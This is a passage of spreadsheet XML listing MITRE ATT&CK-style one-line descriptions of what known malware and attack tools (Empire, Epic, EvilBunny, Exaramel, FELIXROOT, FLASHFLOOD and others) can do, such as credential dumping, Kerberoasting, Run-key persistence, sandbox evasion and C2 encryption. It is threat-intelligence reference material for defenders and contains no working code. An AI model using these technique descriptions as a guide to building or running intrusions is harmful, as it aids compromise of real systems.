    <t>[Empire](https://attack.mitre.org/software/S0363) can use &lt;code&gt;New-GPOImmediateTask&lt;/code&gt; to modify a GPO that will install and execute a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can upload and download to and from a victim machine.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) uses [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; to request service tickets and return crackable ticket hashes.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) includes keylogging capabilities for Windows, Linux, and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>LLMNR/NBT-NS Poisoning and SMB Relay</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks.(Citation: Github PowerShell Empire)(Citation: GitHub Inveigh)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains an implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to gather credentials from memory.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has a module for creating a local user if permissions allow.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to collect emails on a target system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>MSBuild</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use built-in modules to abuse trusted utilities like MSBuild.exe.(Citation: Github PowerShell Empire)
</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains a variety of enumeration modules that have an option to use API calls to carry out tasks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform port scans from an infected host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find shared drives on the local system.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can be used to conduct packet captures on target hosts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has the ability to obfuscate commands using &lt;code&gt;Invoke-Obfuscation&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can perform pass the hash attacks.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit search order hijacking vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules that can discover and exploit unquoted path vulnerabilities.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) leverages PowerShell for the majority of its client-side agent tasks. [Empire](https://attack.mitre.org/software/S0363) also contains the ability to conduct PowerShell remoting with the &lt;code&gt;Invoke-PSRemoting&lt;/code&gt; module.(Citation: Github PowerShell Empire)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use modules like &lt;code&gt;Invoke-SessionGopher&lt;/code&gt; to extract private key and session information.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can find information about processes running on local and remote systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains multiple modules for injecting into processes, such as &lt;code&gt;Invoke-PSInject&lt;/code&gt;.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can modify the registry run keys &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; and &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>SID-History Injection</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can add a SID-History to a user if on a domain controller.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) contains modules for executing commands over SSH as well as in-memory VNC agent injection.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules to interact with the Windows task scheduler.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) is capable of capturing screenshots on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate antivirus software on the target.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Security Support Provider</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate Security Support Providers (SSPs) as well as utilize [PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; and &lt;code&gt;Invoke-Mimikatz&lt;/code&gt; to install malicious SSPs and log authentication events.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can persist by modifying a .LNK file to include a backdoor.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>Silver Ticket</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can leverage its implementation of [Mimikatz](https://attack.mitre.org/software/S0002) to obtain and use silver tickets.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate host system information like OS, architecture, applied patches, and more.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can acquire network configuration information like DNS servers and network proxies used by a host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can enumerate the current network connections of a host.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can capture webcam data on Windows and macOS systems.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can conduct command and control over protocols like HTTP and HTTPS.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) has modules for executing scripts.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) can use WMI to deliver a payload to a remote host.(Citation: Github PowerShell Empire) </t>
  </si>
  <si>
    <t>[Empire](https://attack.mitre.org/software/S0363) can utilize built-in modules to modify service binaries and restore them to their original state.(Citation: Github PowerShell Empire)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) encrypts collected data using a public key framework before sending it over the C2 channel.(Citation: Kaspersky Turla) Some variants encrypt the collected data with AES and encode it with base64 before transmitting it to the C2 server.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) compresses the collected data with bzip2 before sending it to the C2 server.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Turla](https://attack.mitre.org/groups/G0010) has used valid digital certificates from Sysprint AG to sign its [Epic](https://attack.mitre.org/software/S0091) dropper.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has overwritten the function pointer in the extra window memory of Explorer's Shell_TrayWnd in order to execute malicious code in the context of the explorer.exe process.(Citation: ESET Recon Snake Nest)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) has a command to delete a file from the machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) recursively searches for all .doc files on the system and collects a directory listing of the Desktop, %TEMP%, and %WINDOWS%\Temp directories.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers a list of all user accounts, privilege classes, and time of last logon.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) gathers information on local group names.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) heavily obfuscates its code to make analysis more difficult.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /v&lt;/code&gt; command to obtain a list of processes.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;rem reg query&lt;/code&gt; command to obtain values from Registry keys.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net view&lt;/code&gt; command on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) searches for anti-malware services running on the victim’s machine and terminates itself if it finds them.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) encrypts commands from the C2 server using a hardcoded key.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the OS version, hardware information, computer name, available system memory status, disk space information, and system and user language settings.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;nbtstat -n&lt;/code&gt; and &lt;code&gt;nbtstat -s&lt;/code&gt; commands on the victim’s machine.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net use&lt;/code&gt;, &lt;code&gt;net session&lt;/code&gt;, and &lt;code&gt;netstat&lt;/code&gt; commands to gather information on network connections.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) collects the user name from the victim’s machine.(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;tasklist /svc&lt;/code&gt; command to list the services on the system.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net time&lt;/code&gt; command  to get the system time from the machine and collect the current date and time zone information.(Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>[Epic](https://attack.mitre.org/software/S0091) uses HTTP and HTTPS for C2 communications.(Citation: Kaspersky Turla)(Citation: Kaspersky Turla Aug 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has deleted the initial dropper after running through the environment checks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used various API calls as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used EnumProcesses() to identify how many process are running in the environment.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has created Registry keys for persistence in &lt;code&gt;[HKLM|HKCU]\…\CurrentVersion\Run&lt;/code&gt;.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed commands via scheduled tasks.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has been observed querying installed antivirus software.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396)'s dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used the API calls NtQuerySystemTime, GetSystemTimeAsFileTime, and GetTickCount to gather time metrics as part of its checks to see if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used time measurements from 3 different APIs before and after performing sleep operations to check and abort if the malware is running in a sandbox.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has executed C2 commands directly via HTTP.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has an integrated scripting engine to download and execute Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) has used WMI to gather information about the system.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture audio from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture keystrokes.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) adds a Registry Run key for ctfmon.exe to establish persistence.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture screenshots.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[EvilGrab](https://attack.mitre.org/software/S0152) has the capability to capture video from a victim machine.(Citation: PWC Cloud Hopper Technical Annex April 2017)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses crontab for persistence if it does not have root privileges.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can decrypt its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can attempt to find a new C2 server if it receives an error.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can uninstall its persistence mechanism and delete its configuration file.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to download a file from  and to a remote C2 server.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses RC4 for encrypting the configuration.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>Setuid and Setgid</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can execute commands with high privileges via a specific binary with setuid functionality.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) can run &lt;code&gt;whoami&lt;/code&gt; to identify the system owner.(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>Systemd Service</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to execute a shell command on the system.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) uses HTTPS for C2 communications.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) automatically encrypts files before sending them to the C2 server.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Exaramel for Windows](https://attack.mitre.org/software/S0343) specifies a path to store files scheduled for exfiltration.(Citation: ESET TeleBots Oct 2018) </t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV” in an apparent attempt to masquerade as a legitimate service.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) adds the configuration to the Registry in XML format.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to execute VBS scripts on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to launch a remote shell and executes commands on the victim’s machine.(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>The [Exaramel for Windows](https://attack.mitre.org/software/S0343) dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to decompress a local or remote CAB file into an executable.(Citation: Microsoft Expand Utility)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or upload a file over a network share.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) can be used to download or copy a file into an alternate data stream.(Citation: LOLBAS Expand)</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to use the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) can scan all .exe files located in the USB drive.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has commonly set file and path attributes to hidden.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to download a file to the infected system.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has leveraged its keylogging capabilities to gain access to administrator accounts on target servers.(Citation: CheckPoint Volatile Cedar March 2015)(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to write itself to Registry values.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has a function to call the OpenClipboard wrapper.(Citation: CheckPoint Volatile Cedar March 2015)  </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has encrypted communications with the RC4 method.(Citation: ClearSky Lebanese Cedar Jan 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the computer name from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve"> [Explosive](https://attack.mitre.org/software/S0569) has collected the MAC address from the victim's machine.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t xml:space="preserve">[Explosive](https://attack.mitre.org/software/S0569) has collected the username from the infected host.(Citation: CheckPoint Volatile Cedar March 2015) </t>
  </si>
  <si>
    <t>[Explosive](https://attack.mitre.org/software/S0569) has used HTTP for communication.(Citation: CheckPoint Volatile Cedar March 2015)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can delete malware and associated artifacts from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can search files on a victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) uses fake Transport Layer Security (TLS) to communicate with its C2 server.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) encrypts C2 data with RC4 encryption.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can collect operating system (OS) version information, processor information, system name, and information about installed disks from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) collects MAC address and local IP address information from the victim.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) can modify file or directory timestamps.(Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) has been installed as a Windows service.(Citation: CISA AppleJeus Feb 2021)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts collected data with AES and Base64 and then sends it to the C2 server.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the .LNK file from the startup directory as well as the dropper components.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) downloads and uploads files to and from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) deletes the Registry key &lt;code&gt;HKCU\Software\Classes\Applications\rundll32.exe\shell\open&lt;/code&gt;.(Citation: FireEye FELIXROOT July 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) encrypts strings in the backdoor using a custom XOR algorithm.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects a list of running processes.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) queries the Registry for specific keys for potential privilege escalation and proxy information. [FELIXROOT](https://attack.mitre.org/software/S0267) has also used WMI to query the Windows Registry.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) adds a shortcut file to the startup folder for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses Rundll32 for executing the dropper program.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) checks for installed security software like antivirus and firewall.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) creates a .LNK file for persistence.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects information about the network including the IP address and DHCP server.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) collects the username from the victim’s machine.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) gathers the time zone information from the victim’s machine.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses HTTP and HTTPS to communicate with the C2 server.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) executes batch scripts on the victim’s machine, and can launch a reverse shell for command execution.(Citation: FireEye FELIXROOT July 2018)(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FELIXROOT](https://attack.mitre.org/software/S0267) uses WMI to query the Windows Registry.(Citation: ESET GreyEnergy Oct 2018)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) employs the same encoding scheme as [SPACESHIP](https://attack.mitre.org/software/S0035) for data it stages. Data is compressed with zlib, and bytes are rotated four times before being XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system. [FLASHFLOOD](https://attack.mitre.org/software/S0036) will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. [FLASHFLOOD](https://attack.mitre.org/software/S0036) also collects information stored in the Windows Address Book.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on removable media and copies them to a staging area. The default file types copied would include data copied to the drive by [SPACESHIP](https://attack.mitre.org/software/S0035).(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) searches for interesting files (either a default or customized set of file extensions) on the local system and removable media.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) stages data it copies from the local system or removable drives in the "%WINDIR%\$NtUninstallKB885884$\" directory.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLASHFLOOD](https://attack.mitre.org/software/S0036) achieves persistence by making an entry in the Registry's Run key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[FLIPSIDE](https://attack.mitre.org/software/S0173) uses RDP to tunnel traffic from a victim environment.(Citation: Mandiant FIN5 GrrCON Oct 2016)</t>
  </si>
  <si>
    <t>[FTP](https://attack.mitre.org/software/S0095) may be used to exfiltrate data separate from the main command and control protocol.(Citation: Wikipedia FTP)</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) contains a keylogger module.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>Some variants of [FakeM](https://attack.mitre.org/software/S0076) use SSL to communicate with C2 servers.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[FakeM](https://attack.mitre.org/software/S0076) C2 traffic attempts to evade detection by resembling data generated by legitimate messenger applications, such as MSN and Yahoo! messengers. Additionally, some variants of [FakeM](https://attack.mitre.org/software/S0076) use modified SSL code for communications back to C2 servers, making SSL decryption ineffective.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>The original variant of [FakeM](https://attack.mitre.org/software/S0076) encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of [FakeM](https://attack.mitre.org/software/S0076) use RC4 to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)</t>
  </si>
  <si>
    <t>[FatDuke](https://attack.mitre.org/software/S0512) has been packed with junk code and strings.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
